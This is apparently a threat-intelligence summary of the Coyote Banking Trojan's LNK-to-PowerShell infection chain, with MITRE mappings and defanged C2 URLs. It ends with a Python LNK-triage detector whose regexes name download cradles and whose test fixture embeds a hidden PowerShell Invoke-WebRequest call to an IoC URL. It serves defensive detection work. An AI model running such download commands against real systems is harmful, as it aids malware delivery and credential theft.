Coyote Banking Trojan: A Stealthy Attack via LNK Files

This article discusses the multi-stage attack involving the Coyote Banking Trojan, which primarily targets Microsoft Windows users in Brazil. The attack begins with malicious LNK files that execute PowerShell commands to download further payloads. The Trojan is capable of keylogging, capturing screenshots, and phishing. The severity of the threat is high due to its capability to harvest sensitive information from numerous financial applications.

Affected: Microsoft Windows

Key points:

  • FortiGuard Labs identified LNK files executing PowerShell commands to deliver the Coyote Banking Trojan.
  • The malware targets users in Brazil, aiming to collect sensitive information from over 70 financial applications.
  • The Trojan can perform keylogging, capture screenshots, and display phishing overlays.
  • Initial access is gained through malicious LNK files that connect to remote servers.
  • The attack employs a multi-stage process, utilizing various payloads and techniques for execution and persistence.
  • Fortinet products can detect and block the malware effectively.

MITRE Techniques:

  • Execution (T1203) – The LNK file executes a PowerShell command to download and run malicious scripts.
  • Persistence (T1547) – The malware modifies the registry to maintain persistence through a PowerShell command.
  • Credential Access (T1056) – The Trojan performs keylogging to capture user credentials.
  • Exfiltration (T1041) – The malware sends collected sensitive information back to a remote server.
  • Command and Control (T1071) – The Trojan communicates with its command and control servers to receive instructions and send data.

Indicators of Compromise:

  • [url] hxxps://tbet.geontrigame[.]com/zxchzzmism
  • [url] hxxps://yezh.geontrigame[.]com/vxewhcacbfqnsw
  • [url] hxxps://btee.geontrigame[.]com/mvkrouhawm
  • [url] hxxps://qmnw.daowsistem[.]com/fayikyeund
  • [url] hxxps://bhju.daowsistem[.]com/iwywybzqxk
  • Check the article for all found IoCs.
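The initial access described above (an LNK file whose target and arguments launch PowerShell with a download command) leaves its evidence in the StringData section of the shortcut file itself. The following is an added example, not code from Fortinet or from the original article: a small Python parser for the Shell Link format (MS-SHLLINK) that extracts the RelativePath and CommandLineArguments strings, then applies defender-side heuristics: PowerShell launch, download-cradle keywords, hidden-window or execution-policy switches, a minimised ShowCommand, and the two C2 domains listed in the IoCs above (defanged forms are normalised before matching). The sample LNK bytes are constructed in `build_lnk` as a test fixture; the regex patterns and the scoring rule ("PowerShell plus at least one other indicator") are this example's own assumptions, not signatures from the report.

```python
"""Triage Windows .lnk files for PowerShell download cradles and known C2 domains.
Added example (not Fortinet code). Layout follows MS-SHLLINK: a 76-byte header,
optional LinkTargetIDList and LinkInfo, then length-prefixed StringData fields."""
import re
import struct

HEADER_SIZE = 0x4C                                   # ShellLinkHeader is always 76 bytes
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 0x08, 0x10, 0x20
HAS_ICON_LOCATION, IS_UNICODE = 0x40, 0x80
SW_SHOWMINNOACTIVE = 7                               # window opens minimised, never focused

STRING_FIELDS = (("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                 ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                 ("icon_location", HAS_ICON_LOCATION))

# Domains taken from the IoC list on this page; defanged input is normalised before matching.
KNOWN_C2_DOMAINS = ("geontrigame.com", "daowsistem.com")

# Heuristic patterns assumed for this example; tune them to your own telemetry.
SIGNATURES = {
    "launches_powershell": re.compile(r"\b(powershell|pwsh)(\.exe)?\b", re.I),
    "download_cradle": re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer",
        re.I),
    "hidden_or_bypass": re.compile(
        r"-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s|-nop\b|executionpolicy\s+bypass", re.I),
}


def parse_lnk(data: bytes) -> dict:
    """Return LinkFlags, ShowCommand and whichever StringData fields are present."""
    if (len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    show_command = struct.unpack_from("<I", data, 60)[0]
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:              # IDListSize (2 bytes) + ItemIDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                        # LinkInfoSize includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {"flags": flags, "show_command": show_command}
    for name, bit in STRING_FIELDS:                  # CountCharacters (2 bytes) + characters
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        if flags & IS_UNICODE:
            fields[name] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            fields[name] = data[pos:pos + count].decode("cp1252", errors="replace")
            pos += count
    return fields


def analyze_lnk(data: bytes) -> dict:
    """Apply the heuristics to the target path + arguments and return findings and a verdict."""
    fields = parse_lnk(data)
    command = " ".join(fields.get(k, "") for k in ("relative_path", "arguments"))
    refanged = command.replace("hxxp", "http").replace("[.]", ".")
    findings = [name for name, rx in SIGNATURES.items() if rx.search(refanged)]
    if any(domain in refanged.lower() for domain in KNOWN_C2_DOMAINS):
        findings.append("known_coyote_c2_domain")
    if fields["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("window_minimised_no_focus")
    suspicious = "launches_powershell" in findings and len(findings) >= 2
    return {"fields": fields, "findings": findings,
            "verdict": "suspicious" if suspicious else "clean"}


def build_lnk(relative_path: str, arguments: str = "", show_command: int = 1) -> bytes:
    """Constructed test fixture: a minimal Unicode LNK carrying only StringData."""
    flags = IS_UNICODE | HAS_RELATIVE_PATH | (HAS_ARGUMENTS if arguments else 0)
    header = struct.pack("<I16sIIQQQIIIH", HEADER_SIZE, LNK_CLSID, flags,
                         0, 0, 0, 0, 0, 0, show_command, 0) + b"\0" * 10   # Reserved1..3
    body = b""
    for text in (relative_path, arguments):          # spec order: RelativePath before Arguments
        if text:
            body += struct.pack("<H", len(text)) + text.encode("utf-16-le")
    return header + body


# Constructed samples: one mirrors the LNK-to-PowerShell pattern described in the article
# (URL is the first defanged IoC from this page); the other is an ordinary notepad shortcut.
SUSPICIOUS_SAMPLE = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    '-w hidden -nop -c "Invoke-WebRequest hxxps://tbet.geontrigame[.]com/zxchzzmism"',
    show_command=SW_SHOWMINNOACTIVE)
BENIGN_SAMPLE = build_lnk(r"..\..\..\Windows\System32\notepad.exe")

if __name__ == "__main__":
    for label, sample in (("suspicious", SUSPICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        result = analyze_lnk(sample)
        print(label, result["verdict"], result["findings"])
```

Run it against a directory of shortcuts by reading each `.lnk` in binary mode and passing the bytes to `analyze_lnk`; the parser stops after StringData, so the ExtraData blocks at the end of a real file (which may also carry environment-variable paths) are left for a fuller tool. The verdict rule is deliberately conservative: a shortcut that merely points at PowerShell is common in administrative tooling, so at least one further indicator is required before it is flagged.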

Full Research: https://feeds.fortinet.com/~/911964548/0/fortinet/blog/threat-research~Coyote-Banking-Trojan-A-Stealthy-Attack-via-LNK-Files